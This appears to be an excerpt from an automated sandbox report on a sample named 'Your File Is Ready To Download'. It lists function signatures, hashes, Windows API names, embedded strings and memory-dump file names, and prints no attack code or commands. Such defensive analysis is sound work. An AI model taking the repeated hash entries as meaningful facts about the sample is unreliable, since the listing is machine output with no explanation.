                                                                                                                                                                                                                          • API String ID: 0-4087320997
                                                                                                                                                                                                                          • Opcode ID: df67008258fa91a105cce13d756388ead55e87359269fae6e75bbdcc63f90a54
                                                                                                                                                                                                                          • Instruction ID: f8421d74a16c8c3bcebb335d893f5e24c345bf2dc62d06694171e1eecc92832e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: df67008258fa91a105cce13d756388ead55e87359269fae6e75bbdcc63f90a54
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A451A176710B8492EA6ADB62E9447DAA3A4F7487C8F848025EF5C437A1EB34D5B6C300
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: <<>>
                                                                                                                                                                                                                          • API String ID: 0-913080871
                                                                                                                                                                                                                          • Opcode ID: ef5ebffaa43de46858619d578275ca51a0100b11cd731c15d5d311ae15b86f1b
                                                                                                                                                                                                                          • Instruction ID: 98511740575858d3853fe525514465a87edfddc2e43abeedce7fa0500f83c123
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef5ebffaa43de46858619d578275ca51a0100b11cd731c15d5d311ae15b86f1b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B741917130474481F76ADB23A5543E963A2E79DBC4F8A5121FF590B6FACB38D896C304
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: Memory limit reached (see #MaxMem in the help file).$Out of memory.$Removable
                                                                                                                                                                                                                          • API String ID: 0-2684642848
                                                                                                                                                                                                                          • Opcode ID: cef8b63896b454afe62c83519e9c1e557c4513dec90ec7b155a1fd0f8244688f
                                                                                                                                                                                                                          • Instruction ID: 9483473aa52f797cc1568d812a236129b0e430e88ac5834b9643941199e65e6f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cef8b63896b454afe62c83519e9c1e557c4513dec90ec7b155a1fd0f8244688f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F81283264464181FB67DB27D8243EA5363EB4DBE8F604612AB5E1B7F5CB78C482D340
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _errno_invalid_parameter_noinfo$_getptd
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1297830140-0
                                                                                                                                                                                                                          • Opcode ID: b416a2cb25ee6e6fb95a7f50104bc637c5d7290f9da6e34b7e7da12607badb01
                                                                                                                                                                                                                          • Instruction ID: 432520876f86c4a7d8bc0a4b95c9cb7e74ddb7e1d238a7721a40b54a93184684
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b416a2cb25ee6e6fb95a7f50104bc637c5d7290f9da6e34b7e7da12607badb01
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F741F13220878486EB66EF26D5843ED7BA0FB88BD0F544126FF5907BA6DB78C446C750
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Write$FilePrivateProfile$String$CloseCreateFullHandleNamePathSection
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1285757948-0
                                                                                                                                                                                                                          • Opcode ID: e67d542d540fcdca2e6148def769da30ffb16f7c3f279e975704602587f8dab9
                                                                                                                                                                                                                          • Instruction ID: 4071b437d11f30958b33739eaf13896785e608d67b90cd8ec59dfd1298f890c1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e67d542d540fcdca2e6148def769da30ffb16f7c3f279e975704602587f8dab9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66315E36200AC085DB22DF6698143E92365FB5CBD8F844611FF594BBD9DE78C686C714
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MetricsObjectSelectText
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1640997619-0
                                                                                                                                                                                                                          • Opcode ID: 9e3ccf6cb4cf6f09db5a03da322e3185df45fbd831a5f82728f57c21464ab538
                                                                                                                                                                                                                          • Instruction ID: 8eb436b177daa2bdaa5b0b04e2ae376da817d918fa92ad9994032d8206084ab6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9e3ccf6cb4cf6f09db5a03da322e3185df45fbd831a5f82728f57c21464ab538
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E241B332A007848DE767CB33D4653ED7361EB5E7C8F14C31AEB06676A5EB3894819700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$Write$AttributesCloseCreateHandle
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2152948307-0
                                                                                                                                                                                                                          • Opcode ID: 6ade2452d95ef295d9f60d9a2bf86e90da0746c6e817d976d582cb270ea3e3b0
                                                                                                                                                                                                                          • Instruction ID: cf94bf91ba7b48f58f7222d5318a960be2e55d90912ec46021495256d7cfcc38
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ade2452d95ef295d9f60d9a2bf86e90da0746c6e817d976d582cb270ea3e3b0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F621827671468087E7619F26B80079BB294F788BE8F144325BF6547BE4DB38C55ACF04
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MetricsObjectSelectText
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1640997619-0
                                                                                                                                                                                                                          • Opcode ID: 5f4cba9b6fed597a3eb533ef5d6eaff0a4309e8ff7bec479914a67125ed3b2e5
                                                                                                                                                                                                                          • Instruction ID: 9d59315a7fdbaed0768edd02fc5205b36f60ead81233d227081443bf36cfb4a5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5f4cba9b6fed597a3eb533ef5d6eaff0a4309e8ff7bec479914a67125ed3b2e5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BE31A032A00B848DE756CB33D4A43E97361EB5E7C8F14C316EB066B6A5EF3994919700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MetricsObjectSelectText
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1640997619-0
                                                                                                                                                                                                                          • Opcode ID: 03273376da964b51e7d42eb19259ce87cbe78d48c55577f254b0ec3490d77897
                                                                                                                                                                                                                          • Instruction ID: fc5299265e5b78ddafb04e9f8e03f202696f2675404a126d2caf4639d9dceaee
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 03273376da964b51e7d42eb19259ce87cbe78d48c55577f254b0ec3490d77897
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C831A032A00B848DE756CB33D4A43E97361EB5E7C8F14C316EB06AB6B5EF3895919700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _errno_fltin2_getptd_invalid_parameter_noinfoiswctype
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2000152385-0
                                                                                                                                                                                                                          • Opcode ID: bdcc522c411624e7b678b404a804e7733518f85e580d8e9b708400e9def44826
                                                                                                                                                                                                                          • Instruction ID: 9c721a5f4694144b390dc0374c3454c9d595e4ece63fe3d0410a66ffcf75b53d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bdcc522c411624e7b678b404a804e7733518f85e580d8e9b708400e9def44826
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB11827261878481FB679B26E4513EF7760FB98794F244121FBAD0B6E5EA3CC0858B10
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Press [F5] to refresh., xrefs: 000000014003E279
                                                                                                                                                                                                                          • Script lines most recently executed (oldest first). Press [F5] to refresh. The seconds elapsed between a line and the one after , xrefs: 000000014003E056
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick
                                                                                                                                                                                                                          • String ID: Press [F5] to refresh.$Script lines most recently executed (oldest first). Press [F5] to refresh. The seconds elapsed between a line and the one after
                                                                                                                                                                                                                          • API String ID: 536389180-3044854981
                                                                                                                                                                                                                          • Opcode ID: 300494998ed9b1cf961e394886dd14a59798e395158655dab6295eeb85754dbf
                                                                                                                                                                                                                          • Instruction ID: c7d175702d3ba08b30b827d6c0d21040ee3bf71bb16f6f68a497b1ebc6ce360a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 300494998ed9b1cf961e394886dd14a59798e395158655dab6295eeb85754dbf
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0451C172314AC489E7668B3AE8547EB6B91F38D794F548225EF8D43BE9CA3CC445C701
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _amsg_exit_getptd
                                                                                                                                                                                                                          • String ID: csm$csm
                                                                                                                                                                                                                          • API String ID: 4217099735-3733052814
                                                                                                                                                                                                                          • Opcode ID: 08803b1587210fb869c37bb324c154ff8eae623cea55594c0cb4db75334085b2
                                                                                                                                                                                                                          • Instruction ID: e0910fa8c3cbf5b1233f7555ad4f92747ca5953e67d6b3c6a3c93e8655208268
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08803b1587210fb869c37bb324c154ff8eae623cea55594c0cb4db75334085b2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A051B33212439186EB668F679040BEDB6A0FB4DBC4F448119FF5997BA5CB38C893CB15
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharMultiWide
                                                                                                                                                                                                                          • String ID: ?
                                                                                                                                                                                                                          • API String ID: 626452242-1684325040
                                                                                                                                                                                                                          • Opcode ID: 31df9aeb90ae96771ade722821741ca285b0b954d5aab666edca30c884e0c4eb
                                                                                                                                                                                                                          • Instruction ID: 83e836c990b432d4bbff16ca30f59e73494b58b459d87e099bf6d0250c938243
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 31df9aeb90ae96771ade722821741ca285b0b954d5aab666edca30c884e0c4eb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D418032204BC08AEB22DF66E44079A77A4F789BD4F584215FF8E47B65CB38C551C750
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$ForegroundVisible_errno_invalid_parameter_noinfo_wcstoi64wcsncpy
                                                                                                                                                                                                                          • String ID: msctls_statusbar321
                                                                                                                                                                                                                          • API String ID: 2487935071-1022929942
                                                                                                                                                                                                                          • Opcode ID: 901a970e483e7d24ea76181902aa1374b73b1145f713189385beeaae1114a542
                                                                                                                                                                                                                          • Instruction ID: 39ac98f4a3b340eb3b48575ce1749024335d132b683da1ed3dd312caaee4f50d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 901a970e483e7d24ea76181902aa1374b73b1145f713189385beeaae1114a542
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9831C071618780A5E62AEF23A4147DA6366FB8DBC0F094136BF5953BBADE38C541CB04
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileFullNameOperationPath
                                                                                                                                                                                                                          • String ID: \
                                                                                                                                                                                                                          • API String ID: 1380555793-2967466578
                                                                                                                                                                                                                          • Opcode ID: e69c66a4a714aa87cae72ec4132bd44d89f59a37300e6cc546941bd37a2fce47
                                                                                                                                                                                                                          • Instruction ID: 4b82e0dbfe10f2120e0db539cea8ba780252173caacf2be57ed45a088888402c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e69c66a4a714aa87cae72ec4132bd44d89f59a37300e6cc546941bd37a2fce47
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B121C676208B84C2EB51CB21E44439AB3A4FB897A0F104325FBB813AE8DB7CC595CB00
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
